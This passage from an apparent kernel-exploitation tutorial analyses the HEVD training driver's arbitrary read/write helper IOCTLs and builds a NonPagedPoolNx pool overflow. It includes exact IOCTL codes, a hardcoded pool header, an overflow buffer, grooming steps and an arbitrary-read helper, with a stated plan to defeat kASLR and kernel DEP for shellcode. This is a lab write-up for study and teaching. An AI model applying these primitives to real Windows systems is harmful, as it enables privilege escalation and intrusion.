This newly allocated memory is then initialized to zero. The previously declared pointer ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, then has its Name member set to the previously declared pointer Name, whose memory was allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which holds the length sent by the user mode client via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperObjectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and it manages such objects. It is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.
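For reference, the user mode side of this call can be sketched roughly as follows. The ARW_HELPER_OBJECT_IO definition below mirrors the members referenced throughout this post; consult the actual header for the authoritative layout.

#include <windows.h>

// IOCTL to reach CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, as documented above.
#define IOCTL_CREATE_ARW_HELPER_OBJECT 0x00222063

// Mirrors the members referenced in this post; the exact layout comes from
// ArbitraryReadWriteHelperNonPagedPoolNx.h and may differ slightly.
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, *PARW_HELPER_OBJECT_IO;

// Creates one ARW_HELPER_OBJECT_NON_PAGED_POOL_NX in the kernel and returns its
// kernel mode address, which the driver bubbles back through the output buffer.
PVOID CreateHelperObject(HANDLE hDriver, SIZE_T nameLength)
{
    ARW_HELPER_OBJECT_IO io = { 0 };
    io.Length = nameLength;   // size of the Name buffer the driver will allocate

    DWORD bytesReturned = 0;
    DeviceIoControl(hDriver, IOCTL_CREATE_ARW_HELPER_OBJECT,
                    &io, sizeof(io),
                    &io, sizeof(io),
                    &bytesReturned, NULL);

    return io.HelperObjectAddress;
}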

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWithTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we initialized the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is created. We know there is also an array of these objects, and the object created by each CreateArbitraryReadWriteHelperObjectNonPagedPoolNx call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

DbgPrint("[+] Name Length: 0x%X\n", Length);

//
// Get a free index
//

FreeIndex = GetFreeIndex();

if (FreeIndex == STATUS_INVALID_INDEX)
{
    //
    // Failed to get a free index
    //

    Status = STATUS_INVALID_INDEX;
    DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

    return Status;
}

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, has a value assigned for a given index, starting at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current counter value is returned and stored in FreeIndex. This value is then used in the assignment operation which stores the in-scope ARWHelperObject into the array managing all such objects. The loop runs at most MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total number of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which is initialized to 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
  5. Return the address of the ARWHelperObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall that last time we were able to specify the length used to size the Name buffer of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, this function first verifies that the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, actually resides in user mode. After confirming this, the Name member (which is a pointer) from this user mode buffer is stored into the previously declared pointer Name. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contains the kernel mode address of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject - is extracted and stored into the HelperObjectAddress pointer declared at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function accepts any pointer value, but realistically it is used for a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this is what assigns any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array, or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, the function returns the array index at which the given object resides.

Let’s take a look at the next snippet of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the Name member of the user mode ARW_HELPER_OBJECT_IO buffer, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since g_ARWHelperObjectNonPagedPoolNx is, at the end of the day, just an array of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is that the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO is written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has its Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag using the Length specified by our ARW_HELPER_OBJECT_IO structure in the DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode ARW_HELPER_OBJECT_IO buffer. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address, and the call to ProbeForRead will not be able to locate it. Let’s create a user-mode pointer and leverage that instead!
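In code, this just means placing a pointer to a real user mode variable in the Name member before issuing the set IOCTL (0x00222067). A sketch, reusing the ARW_HELPER_OBJECT_IO layout from the earlier sketch:

#include <windows.h>

// Same ARW_HELPER_OBJECT_IO sketch as before.
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO;

// Writes the value pointed to by nameValue into the helper object's Name
// buffer; nameValue is a valid user mode address, so ProbeForRead succeeds.
void SetHelperObjectName(HANDLE hDriver, PVOID helperObjectAddress, ULONG64* nameValue)
{
    ARW_HELPER_OBJECT_IO io = { 0 };
    io.HelperObjectAddress = helperObjectAddress;  // returned by the create IOCTL
    io.Name = nameValue;                           // valid user mode pointer
    // The number of bytes copied was fixed at create time by the Length
    // supplied to the create IOCTL.

    DWORD bytesReturned = 0;
    DeviceIoControl(hDriver, 0x00222067, &io, sizeof(io),
                    &io, sizeof(io), &bytesReturned, NULL);
}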

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue, however, is that the location we can overwrite - the buffer pointed to by ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name - is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that, after the IOCTL call reaches GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.
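For completeness, the read side can be sketched the same way, using the 0x0022206B IOCTL documented above. This assumes the associated helper object was created with a Length of 8, so exactly one QWORD is copied back into our user mode variable:

#include <windows.h>

// Same ARW_HELPER_OBJECT_IO sketch as before.
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO;

// Asks the driver to copy the contents of the helper object's Name buffer back
// into a user mode variable, which it uses as the destination of the copy.
ULONG64 GetHelperObjectName(HANDLE hDriver, PVOID helperObjectAddress)
{
    ULONG64 value = 0;

    ARW_HELPER_OBJECT_IO io = { 0 };
    io.HelperObjectAddress = helperObjectAddress;  // returned by the create IOCTL
    io.Name = &value;                              // destination for the copy

    DWORD bytesReturned = 0;
    DeviceIoControl(hDriver, 0x0022206B, &io, sizeof(io),
                    &io, sizeof(io), &bytesReturned, NULL);

    return value;
}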

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress member points to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which was also allocated by ExAllocatePoolWithTag, is freed.

Now that we know all of the ins and outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case - leveraging a disassembler may take a bit more time to reach the same conclusions).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is currently set to the address of a pool allocation made via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address with a meaningful one. This will allow us to corrupt a controlled address - thus obtaining an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, so it is possible to hardcode the header into the exploit: when the pool overflow occurs and the adjacent header is overwritten, it is simply overwritten with the same content it held before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be located 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit. At the time of the overflow into the next chunk - which should be one of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed - the first 0x10 bytes of that chunk to be overflown, which make up its _POOL_HEADER, will then be preserved and kept valid, bypassing the earlier issue shown when an invalid header occurs.
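Concretely, the buffer handed to the vulnerable IOCTL can be laid out as in the sketch below. This assumes the copy destination is the 0x10-byte data area of the vulnerable chunk, so the out-of-bounds bytes land on the adjacent chunk's _POOL_HEADER first; the second QWORD of that header is assumed to be zero here, so verify it in the debugger (exactly as shown above) before hardcoding anything.

#include <windows.h>
#include <string.h>

// Builds the overflow buffer: 0x10 bytes that fill the vulnerable chunk's own
// data area, then the hardcoded _POOL_HEADER of the adjacent
// ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunk, then the value that overwrites
// its first member (Name).
void BuildOverflowBuffer(BYTE* buffer, SIZE_T bufferSize, ULONG64 newNamePointer)
{
    ULONG64 layout[] = {
        0x4141414141414141,   // our own chunk's data - contents don't matter
        0x4141414141414141,
        0x6b63614802020000,   // hardcoded _POOL_HEADER of the adjacent chunk
        0x0000000000000000,   // second half of the 0x10-byte header, assumed zero
        newNamePointer        // overwrites ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name
    };

    memset(buffer, 0, bufferSize);
    memcpy(buffer, layout, bufferSize < sizeof(layout) ? bufferSize : sizeof(layout));
}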

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects.

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return the value of the Name member, as shown in this blog post. The issue we have had so far, however, is that the address of the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the memcpy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, the destination of the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation, we can clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length, which makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow an adjacent chunk, we need to preserve that chunk’s pool header. Since we are in the kLFH, we can simply hardcode the header value, as we have proven, to satisfy the pool and avoid any crash that would arise from an invalid pool chunk. The destination of the memory copy operation, held in RCX, is the data of the “vulnerable” chunk, and we don’t actually care what lands there, since our only concern is corrupting the adjacent chunk. Because of this, we set the next 0x10 bytes of our copy, the first bytes written out of bounds, to the hardcoded header value, ensuring that the bytes which overwrite the next chunk’s _POOL_HEADER are identical to the original header.
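
To make the layout concrete, this is what the 0x28-byte input buffer for the overflow IOCTL looks like (a preview of the vulnBuffer array used in the full exploit at the end of this post, where mainObject is the ARW_HELPER_OBJECT_IO managing the standalone object):

// 0x28-byte buffer handed to the pool overflow IOCTL
unsigned long long vulnBuffer[5];
vulnBuffer[0] = 0x4141414141414141;                 // fills the vulnerable chunk's 0x10 bytes of data
vulnBuffer[1] = 0x4141414141414141;
vulnBuffer[2] = 0x6b63614802020000;                 // preserves the adjacent chunk's _POOL_HEADER
vulnBuffer[3] = 0x4141414141414141;                 // second half of the 0x10-byte header
vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress; // lands on the adjacent Name member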

We have now successfully performed our out-of-bounds write via a pool overflow and corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member. That pointer is dynamically allocated on the pool beforehand, at an address we do not control unless we use a vulnerability such as this out-of-bounds write, and we have now replaced it with an address we do control: the address of the “main” object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can abuse this to build an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we currently do a “Set” operation on the corrupted object, which is shown in the dt command and has its Name member set to 0xffffa00ca378c210, the driver will perform this operation on the Name member. However, we know that the Name member is actually currently set to the address of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of 0xffffa00ca378c3b0 currently shown in the memory contents displayed by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference the address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified by the user, since we corrupted the previously random address via the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what our goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects; however, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that the vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set the Name value of every grooming object to 0x9090909090909090, we can simply use the “Get” operation to view each grooming object’s Name member. If one of the objects no longer contains NOPs, this indicates that the pool overflow outlined previously, which corrupts the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, has succeeded.

After this, we can use the “Set” functionality in HEVD to set the Name member of the targeted corrupted object. This “tricks” the driver into overwriting what it thinks is the corrupted object’s Name buffer, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite therefore dereferences the standalone object, allowing for an arbitrary read primitive, since we can later use the “Get” functionality on the main object.
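
Condensed into a helper, the read primitive looks roughly like this (a sketch built from the “Set” (0x00222067) and “Get” (0x0022206b) IOCTLs used in the full exploit at the end of this post; it assumes the corrupted grooming object’s array index (index) and the main ARW_HELPER_OBJECT_IO (mainObject) are available, as they are inside readwritePrimitive()):

// Arbitrary read: returns the QWORD located at the kernel address 'where'
unsigned long long readQword(HANDLE driverHandle, unsigned long long where)
{
    DWORD bytesReturned;
    unsigned long long value = 0;

    // "Set" on the corrupted object: its kernel Name pointer is really the address of the
    // main object, so the value 'where' is written into the main object's Name member
    helperobjectArray[index].Name = &where;
    DeviceIoControl(driverHandle, 0x00222067, &helperobjectArray[index],
        sizeof(helperobjectArray[index]), NULL, 0, &bytesReturned, NULL);

    // "Get" on the main object: the driver dereferences its Name member (now 'where')
    // and copies the result into the user-mode buffer we supplied
    mainObject.Name = &value;
    DeviceIoControl(driverHandle, 0x0022206b, &mainObject, sizeof(mainObject),
        &mainObject, sizeof(mainObject), &bytesReturned, NULL);

    return value;
}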

We can then add a “press enter to continue” statement to our exploit to pause execution after the main object, as well as the corrupted grooming object (one of the 5000 objects used for grooming), is printed to the screen.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot, taken while the exploit was paused at the “press enter to continue” statement, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

